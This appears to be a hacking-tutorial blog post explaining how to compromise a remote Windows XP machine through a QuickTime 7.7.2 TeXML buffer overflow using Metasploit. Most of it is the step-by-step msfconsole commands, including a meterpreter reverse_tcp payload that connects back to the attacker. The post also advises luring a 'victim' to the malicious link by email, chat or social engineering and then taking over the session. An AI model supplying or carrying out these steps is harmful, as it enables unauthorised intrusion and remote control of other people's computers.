Hack Remote PC using Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Exploit Targets

Apple QuickTime 7.7.2

Internet Explorer 6 on XP SP2

Internet Explorer 7 on XP SP2


Attacker: Backtrack 5

Victim PC: Windows XP SP 2

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/apple_quicktime_texml_font_table

msf exploit (apple_quicktime_texml_font_table)>set payload windows/meterpreter/reverse_tcp

msf exploit (apple_quicktime_texml_font_table)>set lhost (IP of Local Host)

msf exploit (apple_quicktime_texml_font_table)>set srvhost (This must be an address on the local machine)

msf exploit (apple_quicktime_texml_font_table)>set uripath /(The Url to use for this exploit)

msf exploit (apple_quicktime_texml_font_table)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

For More Meterpreter Commands Click Here

Leave a Reply

Your email address will not be published. Required fields are marked *